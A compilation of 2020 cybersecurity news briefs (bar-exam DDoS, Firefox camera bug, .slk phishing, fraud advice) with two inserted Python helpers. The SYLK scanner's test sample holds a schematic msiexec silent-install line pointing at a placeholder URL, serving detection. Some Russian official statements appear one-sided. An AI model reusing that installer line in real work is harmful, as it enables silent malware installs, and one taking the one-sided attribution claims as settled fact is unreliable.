
Online Michigan Bar Exam Hit by a Distributed Denial of Service (DDoS) Attack



The recently conducted online Michigan bar exam was briefly taken down as it was hit by a rather "sophisticated" cyberattack. 

The test was hit by a distributed denial of service (DDoS) attack, in which a hacker or group tries to bring down a server by overwhelming it with traffic, according to ExamSoft, one of the three vendors offering the exam that certifies prospective attorneys. 

The incident marked the first DDoS attack the company had encountered at the network level, ExamSoft said, and it worked with the Michigan Board of Law Examiners to give test-takers more time once the platform was back up. 

The company noted that "at no time" was any information compromised, and that it had the option to “thwart the attack, albeit with a minor delay” for test-takers. 

The Michigan Supreme Court tweeted, before the company's statement, that a "technical glitch" had taken the test down, and that test-takers were “emailed passwords and the test day will be extended to allow for the delay for some test takers to access the second module.” 

According to the court, those taking the test with accommodations under the Americans with Disabilities Act were not affected by the incident.

“All exam takers were successfully able to start and complete all modules of the Michigan Bar exam,” the organization wrote. 

“This was a sophisticated attack specifically aimed at the login process for the ExamSoft portal which corresponded with an exam session for the Michigan Bar,” ExamSoft said in a statement on Tuesday. 

United for Diploma Privilege, a national group of law students, graduates, professors and lawyers pushing for the bar exam to be postponed during the COVID-19 pandemic, raised concerns about data privacy issues associated with the cyberattack. 

Numerous states have opted to offer the bar exam in-person this month, while others will offer the test online in early October. 

A spokesperson for the National Conference of Bar Examiners (NCBE), which drafts a portion of the test, told 'The Hill' earlier this month that states and jurisdictions could choose to offer the test through vendors such as ExamSoft, Extegrity and ILG Technologies.


Firefox expected to release a fix for their "Camera active after phone locks" bug this October


A bug in Mozilla Firefox enabled websites to keep a smartphone's camera active even after the user left the browser or locked the phone. The company is working on the bug and plans to release a fix around October this year.


The bug was first reported by Appear TV, a video delivery platform, in July last year. It is triggered when a user opens a video streaming site in the Firefox browser on an Android smartphone.

Appear TV first noticed it when video kept playing in the background after it should have stopped: that is, playback continued even when the user switched away from the browser, pushed it to the background or locked the phone. This raised concerns over users' privacy and bandwidth loss. "From our analysis, a website is allowed to retain access to your camera or microphone whilst you're using other apps, or even if the phone is locked," said a privacy app, Traced, in talks with ZDNet. "While there are times you might want the microphone or video to keep working in the background, your camera should never record you when your phone is locked."

On Fixing the Issue

"As is the case with dedicated conferencing apps, we provide a system notification that lets people know when a website within Firefox is accessing the camera or microphone, but recognize that we can do better, especially since this gets hidden when the screen is locked," a Mozilla spokesperson said in a statement.

"This bug [fix] aims to address this by defaulting to audio-only when the screen is locked," Mozilla added. "[The fix] is scheduled for release at the platform-level this October, and for consumers shortly after."

Mozilla has been working on a next-generation browser, Firefox Nightly, with a greater focus on privacy, to replace its current browser for Android. The update is available for testing.

"Meanwhile, our next-generation browser for Android, now available for testing as Firefox Nightly, already has a prominent notification for when sites access this hardware as well," said Mozilla.

Representatives of the Russian government commented on the statements of Western media about the attack of "Russian Hackers"


The media of the United Kingdom and the United States are working in the interests of the authorities, trying to reduce the intensity of critical sentiment among British and American residents, said Alexander Malkevich, First Deputy Chairman of the Commission on Media of the Public Chamber of the Russian Federation, President of the Foundation for the Protection of National Values.

The Daily Telegraph, New York Times, Financial Times and Metro said that the hacker group APT29, allegedly linked to Russian intelligence services, attacked British research centers working on the creation of a vaccine against COVID-19.

In addition, British Foreign Secretary Dominic Raab said that in December last year, Russian hackers "almost certainly" tried to influence the outcome of the parliamentary elections in Great Britain by circulating "illegally obtained" government documents on the Internet.
London threatened to retaliate at the diplomatic level, without providing any evidence to support the claims about "Russian hackers".

According to Maria Zakharova, spokeswoman for the Russian Foreign Ministry, British and American tabloids, and newspapers like the New York Times and the Financial Times, do not need real evidence: anti-Russian publications appear there regularly. Britain made no real attempt to understand the situation.

“The British authorities are aware of the Russian National Coordination Center for Computer Incidents, specially created for this purpose. However, we did not receive any calls in connection with these incidents through official channels,” said an employee of the Russian embassy in London.

Russia's ambassador to the UK, Andrei Kelin, called the accusations that hackers directed by Russian intelligence services tried to steal coronavirus vaccine data “meaningless”. According to him, in today's world it is impossible to attribute hacker attacks to any country.

Russian experts gave tips on protecting a mobile Bank from fraudsters


Two-factor authentication and compliance with digital hygiene rules can protect users from having their mobile banking app on a smartphone hacked.

According to experts, mobile banking apps are quite secure, so most often funds are stolen because of user errors.

“More often, cybercriminals call customers of financial institutions or use malware,” said Sergei Golovanov, a leading expert at Kaspersky Lab. In this case, users may accidentally give fraudsters the card details and login passwords.

Andrey Arsentiev, head of Analytics and Special Projects at InfoWatch Group, believes that any applications are vulnerable to hacking if malware is installed.

Vladimir Ulyanov, head of the Zecurion analytical center, is sure that users need to configure two-factor authentication to receive an additional one-time code. At the same time, the specialist believes that spyware installed on the smartphone can intercept the SMS code from the bank. "It is more secure to perform operations and receive confirmation codes on different devices," Ulyanov said.

"Install the software on your phone only from authorized, approved sources (App Store and Google Play)," said Ruslan Suleymanov, Director of information technology at ESET Russia. In his opinion, customers of credit organizations need to have a separate card for online purchases, set daily limits for transfers, and regularly change passwords.

"You can't tell anyone your card details or login details for the customer bank by telephone. Not a single bank makes such official requests on its behalf,” concluded Suleymanov.

According to the founder of DeviceLock, Ashot Hovhannisyan, it is best not to use a mobile banking app at all, but to log in to your personal account on a computer protected by antivirus. If mobile banking is important, then you should avoid jailbreaking the phone and installing dubious programs through alternative stores.

In addition, Roskachestvo experts have recommended that users regularly update the software on their devices, even if they see no particular need for it. Otherwise, it can lead to unpleasant consequences.

Indian Organizations Suffer the Most in Public Cloud Security Incidents



In a survey of 26 countries on public cloud security incidents, India emerged as the hardest-hit nation in the previous year, with 93 percent of its organizations experiencing an incident.

The survey included more than 3,500 IT managers across 26 nations in Europe, the Americas, Asia Pacific, the Middle East and Africa that currently host data and workloads in the public cloud.

The cybersecurity incidents that Indian organizations suffered most included ransomware (53 percent) and other malware (49 percent), exposed data (49 percent), compromised accounts (48 percent), and cryptojacking (36 percent), said the report titled "The State of Cloud Security 2020" by cybersecurity company Sophos.

European organizations appear to have suffered the fewest cloud security incidents, an indicator that compliance with General Data Protection Regulation (GDPR) guidelines is helping protect organizations from being compromised.

However, India still has not enacted a data protection law.

Chester Wisniewski, Principal Research Scientist at Sophos said in a statement, "Ransomware, not surprisingly, is one of the most widely reported cybercrimes in the public Cloud."

"The recent increase in remote working provides extra motivation to disable Cloud infrastructure that is being relied on more than ever, so it's worrisome that many organizations still don't understand their responsibility in securing Cloud data and workloads," Wisniewski added later.

"Cloud security is a shared responsibility, and organizations need to carefully manage and monitor Cloud environments in order to stay one step ahead of determined attackers."

According to the report, more than 55 percent of Indian organizations and businesses revealed that cybercriminals obtained access through the stolen Cloud provider account credentials.

Despite this, only 29 percent said managing access to cloud accounts is a top area of concern. 'Accidental exposure' also continues to plague organizations, with misconfigurations exploited in 44 percent of reported attacks on Indian organizations.

With 76 percent of organizations using the public cloud, detection and response are the leading cloud security concern for IT managers in India, while data security remains the top concern for organizations worldwide.

A gift for a hacker: experts name the easiest passwords to hack



Experts have conducted research and identified the patterns that let an attacker work out the password used to log in to another user's system on the Internet when the combination chosen is too simple, and therefore unreliable.

According to Ekaterina Kilyusheva, head of the research group in the information security analytics department of Positive Technologies, it is not difficult for hackers to crack passwords built from simple words such as password or qwerty, or from users' personal data such as a name, date of birth or phone number. This became clear after the company's experts analyzed the passwords of users in 96% of large companies.

“The results showed that one of the most popular was a password of the format ‘Month, Year’ (in Russian) typed in the English keyboard layout, for example, Ltrf,hm2019 or Fduecn2019. Such passwords were found in every third company, and in one organization they were selected for more than 600 users,” said Kilyusheva.

Experts unanimously recommended not using default passwords and not using weak combinations that cybercriminals will try first. These include sequences of digits such as 12345, dates of birth such as 01.01.1990, phone numbers, and simple words like password or qwerty.

Passwords in the format "name + year of birth" and the names of loved ones are also at risk: such data is easy to find in the public domain, for example on social networks, said Anton Ponomarev, Director of corporate sales at ESET Russia.

"Passwords consisting of a random set of letters, numbers and signs are the most difficult to crack, but, of course, much depends on their length," added the founder of DeviceLock Ashot Hovhannisyan.
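The 'Month, Year' pattern described above can be checked mechanically: re-reading the characters as keys on the Russian (ЙЦУКЕН) layout turns Ltrf,hm2019 into Декабрь2019. The checker below is an added example, not code from Positive Technologies, ESET or the post's authors; it applies that layout trick alongside the other weak patterns the experts list, and its rule names, layout table and thresholds are its own assumptions.

```python
"""Weak-password checks modelled on the patterns named in the article.

Added example (not code from any company quoted). The layout table and
the rule set are assumptions chosen for illustration.
"""
import re

# QWERTY key -> Cyrillic letter on the same physical key (ЙЦУКЕН layout)
_QWERTY = "qwertyuiop[]asdfghjkl;'zxcvbnm,./`"
_JCUKEN = "йцукенгшщзхъфывапролджэячсмитьбю.ё"
LAYOUT = str.maketrans(_QWERTY, _JCUKEN)

MONTHS_RU = ("январь", "февраль", "март", "апрель", "май", "июнь", "июль",
             "август", "сентябрь", "октябрь", "ноябрь", "декабрь")
MONTH_YEAR = re.compile("^(%s)(19|20)[0-9]{2}$" % "|".join(MONTHS_RU))
# dd.mm.yyyy, dd-mm-yyyy or dd/mm/yyyy, the date-of-birth shape named above
DATE = re.compile(r"^[0-3][0-9][./-][01][0-9][./-](19|20)[0-9]{2}$")
# a small stand-in for a real common-password list
COMMON = {"password", "qwerty", "123456", "12345", "admin", "welcome"}


def to_russian_layout(text):
    """Re-read characters typed in the English layout as Cyrillic keys."""
    return text.lower().translate(LAYOUT)


def is_digit_sequence(text):
    """True for runs such as 12345 or 98765 (four or more digits, step +/-1)."""
    if not text.isdigit() or len(text) < 4:
        return False
    steps = {ord(b) - ord(a) for a, b in zip(text, text[1:])}
    return steps in ({1}, {-1})


def weak_password_reasons(password, personal=()):
    """Return the name of every weak-pattern rule the password trips.

    personal: words tied to the user (first name, surname, names of loved
    ones) that should not anchor the password, per the ESET advice above.
    """
    pw = password.lower()
    reasons = []
    if len(pw) < 8:
        reasons.append("too-short")
    if pw in COMMON:
        reasons.append("common-word")
    if is_digit_sequence(pw):
        reasons.append("digit-sequence")
    if DATE.match(pw):
        reasons.append("date-of-birth-format")
    if pw.isdigit() and len(pw) >= 7:
        reasons.append("phone-number-like")
    # the Positive Technologies finding: a Russian month + year typed on
    # the English layout, e.g. Ltrf,hm2019 -> декабрь2019
    if MONTH_YEAR.match(to_russian_layout(pw)):
        reasons.append("month-year-ru-layout")
    for word in personal:
        if re.fullmatch(re.escape(word.lower()) + r"(19|20)?[0-9]{2}", pw):
            reasons.append("name-plus-year")
            break
    return reasons


if __name__ == "__main__":
    for candidate in ("Ltrf,hm2019", "Fduecn2019", "01.01.1990", "12345",
                      "alexey1985", "T7#kq9!vLm2xR"):
        print(candidate, weak_password_reasons(candidate, personal=("Alexey",)))
```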

Ozon launched a bug bounty on HackerOne


The reward for each bug found will depend on the degree of its impact on the service, the potential damage that the vulnerability can cause, the quality of the report and other factors

Ozon, one of the largest online stores in Russia, has launched its own vulnerability search program on the well-known HackerOne platform. As it is the first Russian e-commerce company to do so, it is hoped that it will set an example for other projects.

To launch the bug bounty program, Ozon first plans to invest $41,800 in working with researchers searching for vulnerabilities in systems.

At the same time, not only Russian cybersecurity experts but also experts from abroad can participate in the online store program.

According to the company, the launch of the program will provide round-the-clock security monitoring; it will not replace the work of the Ozon IT laboratory team in securing Ozon services but will complement it. Currently, more than 1,000 engineers work in the Ozon IT lab, and 3.5 million users visit the Ozon website and app every day.

"Now the company has the necessary resources not only to develop its own security services but also to work with the hacker community," said Ozon.

Today, not many Russian companies resort to an organized search for vulnerabilities. Notable exceptions are giants like Yandex, Mail.ru and Qiwi. Ozon became the next major project, as the company had the resources not only to develop its own security services but also to interact with the community of ethical hackers.

Like programs of other companies, the bug bounty from Ozon involves a cash reward, the amount of which depends on the severity of the bug found. For example, a company can pay about $240 for an XSS hole.

Something more dangerous, such as an RCE (remote code execution) vulnerability, can bring the researcher up to $1,600.

In May, HackerOne representatives said that the platform had paid researchers a total of $100 million over the entire lifetime of the project. And in early July, the list of the most generous HackerOne participating companies became known.

A New and Amazingly Simple Device in an Era of Pandemics to Protect Your Privacy



A period of pandemics and social distancing sent more people than ever into the work-from-home world. These new realities mean average consumers at home wound up confronted with yet another problem. 

Many of their household internet setups lack the security and protection of larger workplace setups, which incorporate enhanced cybersecurity and firewalls. Enter a new and incredibly simple device to plug those privacy gaps at the source. 

The Firewalla cybersecurity unit hit the market before anyone even knew what a coronavirus was. Nobody could have envisioned how timely its features would prove. It was initially expected to prevent the 'creep next door' from hijacking the user's Wi-Fi signal or taking advantage of their home security cameras. 

The device is made to shield all devices on the network from cyberattacks and alert the user when anything suspicious is so much as attempted. Once the user buys the unit and sets it to guard duty, there is no monthly fee. 

The device also comes with a rather unusual feature: besides building a personal online firewall, there is the "Family Time Social Hour" function that blocks every single social media platform one hour at a time. 

Whether the user wants to force everybody to get some work done or ground the kids in some face-to-face interaction, a world without Twitter or Facebook for an hour is indeed a brilliant place. 

Apart from keeping the user's private messages, documents and other online activity behind the home's own ready-made firewall, this little blue box enables monitoring of any minor's Wi-Fi use. 

Parents can likewise utilize Firewalla to keep out unwanted sites and online networking intruders. 

The devices are simple to set up and improve personal and home online security in numerous ways; the Firewalla is a sensibly priced and viable choice for protecting online privacy, whether or not your home has become a base for pandemic-time remote work. 

The Firewalla Blue comes with 500Mb processing power, while the more affordable Firewalla Red offers 100Mb and sells for $109. At present, only the Firewalla Red is available on Amazon. However, both versions remain available and in stock on the Firewalla website.


In six months, hackers attacked Russian government systems more than a billion times


Since the beginning of the year, Russia's critical digital infrastructure has been subjected to cyberattacks more than a billion times, said Andrey Krutskikh, Director of international information security at the Russian Foreign Ministry, in an interview published on June 29 in the journal International Life.

“Since the beginning of this year, more than 1 billion malicious information impacts on the critical information infrastructure of the Russian Federation have been recorded,” said Krutskikh.

According to him, coordinated targeted attacks have become more frequent. Over the past few months, the number of such actions has exceeded 12,000, with state authorities, the credit and financial sector, healthcare, the defense industry, science and education chosen as the main targets.

"These figures confirm the enormous danger posed by computer attacks, since the attacked objects ensure the daily life of society and the state, and the security of our citizens," stressed the special representative of the President.

According to him, the greatest danger is that incidents in the online space can lead to a full-scale conflict in the offline world. Therefore, Krutskikh once again recalled Russia's calls on the world community to cooperate against terrorism in the new digital age. The expert is sure that the use of Information and Communication Technologies (ICT) threatens the sovereignty of states.

"Russia calls for more effective international cooperation in the fight against the threat of terrorism, especially in the digital age. The use of ICT by terrorists is a clear challenge to international peace and security arising from the illegal use of these technologies. This is not just a criminal problem, it is also a political problem. Such actions pose a threat of violating the sovereignty of States and interfering in their internal Affairs," said the diplomat.

Recall that in 2019, Krutskikh stated that the number of cyberattacks is growing, with about 70 million attacks per year carried out against Russian state structures. The damage on a global scale is already measured in trillions of dollars and by 2022 will reach up to 8 trillion dollars.

Enterprises Improving Their Response to Cybersecurity Incidents, Yet Contributing To Reduce the Effectiveness of Defense


IBM recently released the results of a global survey, which suggested that while investment and planning are on the rise, effectiveness is not keeping pace, with response efforts hindered by the complexity of fragmented toolsets.

Conducted by the Ponemon Institute, the research drew on responses from more than 3,400 security and IT staff across the world.

This research was IBM's fifth annual Cyber Resilient Organization Report, which says that while organizations are improving in cyberattack planning, detection and response, their capacity to contain an active threat has declined by 13%.

On average, enterprises deploy 45 cybersecurity-related tools on their networks, yet the widespread use of too many tools may contribute to an inability not only to detect, but also to defend against, active attacks.

It appears that enterprise cybersecurity is reaching a new level of maturity: 26% of respondents said their organizations have now adopted formal, enterprise-wide Cyber Security Incident Response Plans (CSIRPs), up from 18% five years ago.

In total, however, 74% of respondents said their cybersecurity planning posture still leaves something to be desired, with no plan, ad-hoc plans, or inconsistency still a thorn in the side of their IT staff.

Furthermore, among those who have adopted a response plan, just a third have created playbooks for common attack types to watch for during daily operations.

"Since different breeds of attack require unique response techniques, having pre-defined playbooks provides organizations with consistent and repeatable action plans for the most common attacks they are likely to face," the report notes.

According to IBM, a lack of planning and response testing can lead to a damages bill up to $1.2 million higher than a cyberattack would otherwise have cost a victim company, and the cost in terms of disruption can be high as well.

IBM added: "With business operations changing rapidly due to an increasingly remote workforce, and new attack techniques constantly being introduced, this data suggests that many businesses are relying on out-dated response plans which don't reflect the current threat and business landscape."

Given the COVID-19 pandemic and the rapid, sudden changes many of us have experienced in our workplaces, CSIRP arrangements should be reviewed and, if necessary, changed to fit the work-from-home environment.

Indians to use VPN as a way to evade ban on Chinese Apps


It seems people have found a way to circumvent the government's ban on 59 Chinese apps, including favorites like TikTok, SHAREit, Shein, Clash of Kings and many more, and have turned to VPNs (Virtual Private Networks) to access these apps.


Right after the government's ban announcement, companies like SatoshiVPNS put an advert on their social media stating, "An investment in a VPN is an investment that always pays for itself — many times over." There have been articles on blabberpost and elsewhere recommending how and which VPN to use to access the banned applications.

And it's not the first time Indians have turned to VPNs to dodge regulations; in fact, we are quite notorious when it comes to VPN use. After Reliance Jio, Bharti Airtel and Vodafone Idea, the largest telecom providers in the country, blocked porn websites on their networks, India fell only three places, from 12 to 15, in terms of visitors to Pornhub. A 2019 report from Pornhub revealed that 91% of Indian users access the site via mobile phone.

Since February, India has seen a growth of 15% in VPN usage, according to a report by ExpressVPN; the global average stands at 21%. 

By the book, using a VPN is not illegal in India as long as it is not used for any illegal activity. The most common uses of a VPN in the country are to watch pornography or to access torrents, and neither of these attracts legal action.

Since the suspension of Internet service in the Kashmir Valley from August 2019 until March 2020, and the weak 2G and 3G networks that followed, many citizens turned to VPNs to reach blocked content on Facebook, Twitter and other social media sites. The government even arrested some people for using VPNs to promote unlawful activities.

After the ban, Google Play and the Apple App Store removed TikTok and Helo for Indian users, but other banned apps such as browsers, Club Factory, Shein, SHAREit and Clash of Kings are still listed on both stores.

Hackers abusing .slk files to attack Microsoft 365 users


Avanan’s security analysts have recently discovered a threat that bypasses Microsoft 365 security; the attack uses .slk files to avoid detection.


The attackers send emails containing a .slk file as an attachment with a macro (an msiexec script) that downloads and installs the trojan. Although this attack is limited to Microsoft 365, bypassing both its default security (EOP) and advanced security (ATP), it puts some 200 million-plus users at risk.

So far Gmail users are safe from this threat, as Google blocks .slk files and does not allow them to be sent as attachments.

The attack

The “Symbolic Link” (SLK) file is an older, human-readable, text-based spreadsheet format last updated in 1986. Back when XLS was a proprietary format, .slk was the open-format alternative, but XLSX was introduced in 2007 and there was no longer any need for .slk. To the user, these .slk files look like an Excel document, and they let the attacker slip past Microsoft 365 security.

This latest discovery by Avanan’s security analysts reveals that these files, when opened, run a command on the Windows machine. It drives Windows Installer to install any MSI package silently. This particular attack installs a hacked version of the off-the-shelf NetSupport remote control application, giving the attacker full control of the desktop.

Where did the mails come from? 

The majority of the malicious emails were sent from a disposable email address like, “randomwords1982@hotmail.com”.

These mails were sent from Hotmail and for a good reason, "While most of the well-known anonymous email sending engines deserve their poor spam and phishing reputations, Hotmail users benefit from Microsoft’s own reputation. Since the service was merged with its own Outlook application, Microsoft seems to grant them a higher level of trust than external senders", reports Informationsecuritybuzz.com.

The peculiar thing about these emails is that they are manually created and personally targeted. No two mails are alike; each has a different subject and body specially crafted for the recipient, with a subject and content that concern them.

How to prevent the attack?

The best way to avoid this attack is simply to configure your Office 365 tenant to reject files with the .slk extension, at least until Microsoft fixes the issue.
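A mail-side check in that spirit, added here as an example and not code from Avanan or the original post: it flags SYLK attachments by extension and, because the format is recognised by its leading ID record rather than its name, also by content, then escalates when a cell carries a formula that calls an installer. The sample sheets, the message built around them and the verdict names are constructed for illustration.

```python
"""Flag SYLK (.slk) attachments in incoming mail.

Added example, not code from Avanan or the original post. Assumes mail is
available as raw RFC 822 bytes; the sample sheets and the message are
constructed here and are not real captures.
"""
import email
import re
from email import policy
from email.message import EmailMessage

SYLK_MAGIC = b"ID;P"  # every SYLK file opens with an ID record

# constructed sample: harmless sheet with two value (K) cells
BENIGN_SLK = b"ID;PWXL;N;E\r\nC;X1;Y1;K42\r\nC;X2;Y1;K\"total\"\r\nE\r\n"
# constructed sample: a cell whose expression (E) field carries an msiexec
# call, the Windows Installer behaviour the article describes (schematic,
# not a working payload; the URL is a placeholder)
MALICIOUS_SLK = (
    b"ID;PWXL;N;E\r\n"
    b"C;X1;Y1;E=msiexec /q /i PLACEHOLDER_URL\r\n"
    b"E\r\n"
)

# expression fields that reach outside the sheet: external-link pipe or
# an installer invocation
SUSPICIOUS = re.compile(r"\||msiexec", re.IGNORECASE)


def is_sylk(data):
    """Content check, so a renamed .slk (e.g. sent as .xls) is still caught."""
    return data.lstrip().startswith(SYLK_MAGIC)


def sylk_formulas(data):
    """Return the expression (E) field of every cell (C) record."""
    formulas = []
    for line in data.decode("latin-1").splitlines():
        if not line.startswith("C;"):
            continue
        for field in line.split(";")[1:]:
            if field.startswith("E"):
                formulas.append(field[1:])
    return formulas


def classify_sylk(data):
    """'allow' for value-only sheets, 'review' for any formula cell,
    'block' for formulas that invoke external programs, else 'not-sylk'."""
    if not is_sylk(data):
        return "not-sylk"
    formulas = sylk_formulas(data)
    if any(SUSPICIOUS.search(f) for f in formulas):
        return "block"
    return "review" if formulas else "allow"


def scan_message(raw):
    """Return (filename, verdict) for each attachment that is SYLK by
    extension or by content; the verdict is what a mail-flow rule acts on."""
    msg = email.message_from_bytes(raw, policy=policy.default)
    findings = []
    for part in msg.iter_attachments():
        name = part.get_filename() or ""
        data = part.get_payload(decode=True) or b""
        if name.lower().endswith(".slk") or is_sylk(data):
            findings.append((name, classify_sylk(data)))
    return findings


def build_message(filename, data):
    """Construct a test message carrying one attachment (sample only)."""
    msg = EmailMessage()
    msg["From"] = "randomwords1982@example.invalid"
    msg["To"] = "finance@example.invalid"
    msg["Subject"] = "Invoice"
    msg.set_content("Please see the attached sheet.")
    msg.add_attachment(data, maintype="application",
                       subtype="octet-stream", filename=filename)
    return msg.as_bytes()


if __name__ == "__main__":
    for fname, blob in (("q2.slk", BENIGN_SLK), ("invoice.slk", MALICIOUS_SLK),
                        ("invoice.xls", MALICIOUS_SLK)):
        print(fname, scan_message(build_message(fname, blob)))
```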

Bharti Airtel on cyber high alert - upgrades security measures


New Delhi: Bharti Airtel, India's major telecom service provider, has raised its cybersecurity to a higher threat level for the next week in the aftermath of various cyberattacks.


They have scaled up their SOC (security operations center) to withstand upcoming attacks and are working on eliminating any vulnerability that could invite an attack.

"We have come across media reports on the potential surge in cyber-attacks such as DDoS, Malware attacks, and defacement of websites. We have also witnessed an increase in such Cyber activity during our security operations. These attacks threaten to not only disrupt critical business operations but also impact your brand’s reputation," Airtel said in communication with its many enterprise customers.

Airtel, which works with half a million small and medium enterprises and 2,000 large enterprises, has communicated the security concern and asked them to take preventive measures as well.

And Airtel is not wrong in estimating the risk: CERT-In, the national cybersecurity agency, has warned of probable large-scale phishing attacks.

The odds are against Airtel, as the current outlook against a massive cyberattack is not hopeful: most employees are still working from home, and a lack of security training together with a plethora of attacks has forced the organization to strengthen its cybersecurity.

"Airtel has urged its customers to take proactive measures such as continuous monitoring of network traffic for all channels, which include email, the internet, and others. It has also asked enterprise customers to enable geo-location monitoring for traffic coming from neighboring countries", reports Cisco, Economic Times.

The company has issued an advisory to its customers and enterprises to apply all available software updates and patches and to strengthen server and application infrastructure. The telecom operator has advised employees to install proper security measures such as antivirus, to keep patches up to date, and to be careful of phishing attacks.

Know ways to avoid credit or debit card frauds


Since 2016, when India decided to go cashless, online payments have grown exponentially, but not without risks. Online payments seem quick and easy, but it is not hard for your financial data to be stolen. With every transaction and swipe you put your credit at risk.


In 2019, India faced a banking hazard as 32 lakh debit cards from 19 banks, including HDFC Bank, ICICI Bank and Axis Bank, were compromised, with a loss of 1.3 crores. The cyber-world is littered with examples like this, and people often think it is inevitable that they will be duped at least once, that even if they are careful their cards will be compromised at some point. But it doesn't have to be so; with the following measures we can greatly reduce the risk of debit and credit card fraud.

Register for alerts

The best way to prevent a bogus transaction is to set up email or SMS alerts, as they will at least give you a warning as to when a transaction is made or tried. And if the said transaction is not by you then you can take action immediately.

Don't save your card information on websites

It's not foolproof, but it would certainly close some loopholes. It's better to limit the sites where you save your card details and to know every site you have them saved on. Best to save them only on trustworthy sites.

Be careful

The Internet is full of bait, so be prudent before clicking on any too-good-to-be-true deal, especially one that asks for your card details. Be paranoid about fishy email links and treat them as red flags.

Log out

It is prudent to log out of e-commerce sites and apps, and never to save passwords on your phone.

Check Statements Regularly

Check your bank statements for any suspicious activity, so you can catch one early on. Sometimes, the fraudsters might use the card multiple times so as soon as you find something suspicious report it and cancel the card via the bank.

Use Online Wallets and UPI

As online wallets and UPI don't disclose your account details or card details, it's better to use them instead of credit or debit cards for e-commerce.

It goes without saying that you should always err on the side of caution and never disclose your financial details to anyone. With a few careful steps you can reduce the risk of falling victim to card fraud, and even if you do, many banks offer insurance for such cases, so go through your bank's policies thoroughly; they may save you a great deal.

Expert: the image of a "Russian hacker" has become a means of information warfare with the Russian Federation


Experts commented on the release of the report by independent public organizations, "Information fight against Russia: constructing the image of the enemy".

The director of the Center for Political Information, Alexei Mukhin, noted that the report analyzed how the image of the "Russian hacker" works. According to him, this image is replicated much less through the media than through social networks.

The image of a "Russian hacker", as Mukhin said, is mainly distributed via Twitter using similar hashtags, such as #Russianhacker. This is done to attract attention, to redirect the user to materials that demonstrate "horror and lawlessness".

This forms a "public opinion", with which not only politicians but also the military are already working. This is bad, because, in their hands, the information struggle turns into a hybrid war.

In different years, according to this scheme, Russia was accused of various outrages: in 2014, of participation in the war in the Donbass; in 2016, of interference in the American elections.

It is characteristic that as soon as Russia demands to see the evidence, it turns out there is none.

Anna Shafran, a TV and radio host, believes that an open information war has already begun.

According to her, recently, YouTube blocked without warning or explanation three popular Russian resources, including the TV company "Crimea-24". The Russian Foreign Ministry, of course, protested and rightly qualified the incident as an attack on Russian-language resources from the American Internet platform.

Sergei Sudakov, a Professor at the Military Academy of Sciences, said that the meme "Russian mafia" was created in the interests of the United States in the 1990s. It is now outdated and has been replaced by a new meme, "Russian hacker". It is fashionable to present Russia as an international information terrorist.

It is worth noting that in the Russian segment of the Internet, the meme "Russian hackers" is perceived roughly the way "British scientists" is. In the foreign segment, by contrast, the concept of "Russian hackers" is linked to such concepts as danger, interference, and, more recently, incitement to riot.

The First Ransomware Attack and the Ripples It Sent Forward In Time


What was once a simple piece of malware, discovered just 20 years ago this month, showed a capacity that transformed the entire universe of cyber-security as we know it today.

Initially expected to do no more than harvest the passwords of a couple of local internet providers, the malware, dubbed 'LoveBug', spread far and wide, infecting more than 45 million devices and becoming the first piece of malware to truly take businesses offline.

LoveBug marked the shift of malware from limited exposure to mass destruction: 45 million compromised devices a day could become 45 million daily payments.

Be that as it may, eleven years before anybody had heard of LoveBug, the IT industry saw the first major case of ransomware, the AIDS Trojan, which spread through infected floppy disks sent to HIV specialists as part of a knowledge-sharing initiative.

The 'lovechild' of LoveBug and the AIDS Trojan was the ransomware that followed, with GPCoder and Archievus hitting organizations around the globe, and with the hackers additionally harnessing e-commerce sites to find better ways of receiving payments.

The security industry responded by taking the necessary steps, with 'good actors' cooperating to decipher the encryption on which Archievus depended and sharing the result widely to help victims avoid paying any ransom.

From that point forward the 'cat and mouse' game has continued, with viruses like CryptoLocker, CryptoDefense, and CryptoLocker2.0 devising new attack strategies and the security industry deploying new defenses. Ransomware has now become increasingly sophisticated and progressively more prevalent, and targets today are less likely to be individuals, since large businesses can pay enormous sums of cash.

And yet data protection has become progressively more sophisticated as well, with four areas that should now be part of every business' ransomware strategy: protect, detect, respond, and recover. Social engineering and phishing are also now becoming central to the success of a ransomware attack.

LoveBug was effective in a scattergun fashion, yet it still depended on social engineering.

Had individuals been less inclined to open an email with the subject line 'I love you', the spread of the malware would have been 'far more limited'.

Nevertheless, users now ought to be more alert to the increasingly diverse threats, because attackers are increasingly extending their threats to data exfiltration or public exposure when they feel that leaking data may be more 'persuasive' for their targets.

Thus, to respond to the issue, it is essential to have backup copies of data and to understand the nature and value of the information that may have been compromised in any way.

A Series Of Cyber Essentials Toolkits Released To Address Cyber-Security Risks


Following its own November 2019 release of Cyber Essentials, a starting point for small businesses and government agencies to understand and address cybersecurity risk alongside their other risks, the Cybersecurity and Infrastructure Security Agency (CISA) has released the first in a series of six Cyber Essentials Toolkits.

CISA's toolkits will give greater detail, insight, and resources on each of Cyber Essentials' six "Essential Elements" of a Culture of Cyber Readiness.

The launch of the introductory "Essential Element: Yourself, The Leader" will be followed every month by another toolkit, one for each of the six "Essential Elements." Toolkit 1 focuses on the role of leadership in shaping a culture of cyber readiness in their organization, with an emphasis on strategy and investment.

CISA Director Christopher Krebs says “We thank all of our partners in government and the private sector who played an essential role in the development of CISA’s Cyber Essentials Toolkit. We hope this toolkit and the ones we are developing, fills gaps, and provides executives the tools they need to raise the cybersecurity baseline of their teams and the organizations they lead.”

Cyber Essentials, created in collaboration with small businesses and state and local governments, aims to equip smaller organizations that have generally not been part of the national dialogue on cybersecurity with basic steps and resources to improve their cybersecurity.

Cyber Essentials has two sections: the core principles for leaders to build a culture of security, and specific actions for them and their IT professionals to put that culture into action. Each of the six Cyber Essentials includes a list of actionable items anybody can take to lower cyber risk.

These are:

  •  Drive cybersecurity strategy, investment, and culture;
  •  Develop a heightened level of security awareness and vigilance;
  •  Protect critical assets and applications;
  •  Ensure only those who belong on your digital workplace have access;
  •  Make backups and avoid loss of info critical to operations;
  •  Limit damage and restore normal operations quickly.

Several Vulnerabilities Identified In Emerson OpenEnterprise


Four vulnerabilities were recently found in Emerson OpenEnterprise. They were reported to the vendor in December 2019, and patches were released a couple of months later.

Roman Lozko, a researcher at Kaspersky's ICS CERT unit, identified the flaws, and the security holes he found have been described as heap-based buffer overflow, missing authentication, improper ownership management, and weak encryption issues.

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) and Kaspersky published advisories for three of the vulnerabilities a week ago. The remaining vulnerability was described by Kaspersky in an earlier advisory.

According to Emerson, OpenEnterprise is specifically designed to meet the requirements of organizations focused on oil and gas production, transmission, and distribution.

